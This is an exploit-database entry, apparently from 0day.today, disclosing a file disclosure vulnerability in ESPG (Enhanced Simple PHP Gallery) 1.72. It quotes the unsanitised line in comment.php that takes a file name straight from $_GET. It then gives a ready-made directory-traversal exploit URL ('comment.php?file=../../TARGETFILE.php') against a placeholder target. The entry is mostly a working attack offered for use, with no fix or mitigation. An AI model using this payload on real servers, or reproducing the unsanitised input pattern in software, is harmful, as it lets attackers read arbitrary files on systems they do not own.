id: 4701
date: 01/18/2009
title: ESPG (Enhanced Simple PHP Gallery) 1.72 File Disclosure Vulnerability
author: bd0rk
cves: 

=====================================================================
ESPG (Enhanced Simple PHP Gallery) 1.72 File Disclosure Vulnerability
=====================================================================


                      .::ESPG 1.72 File Disclosure Vulnerability::.
 
 

 => Scriptname: ESPG (Enhanced Simple PHP Gallery) 1.72

 => Vendor: http://quirm.net
 
 => Download: http://quirm.net/download/21/

 => Bugfounder: bd0rk

 => Vulnerable Code in comment.php line 3

            -------------------------

             $fileid = $_GET['file'];

            -------------------------



[+]Sploit: http://[t4rg3t]/gallery/comment.php?file=../../TARGETFILE.php






#  0day.today [2023-03-27]  #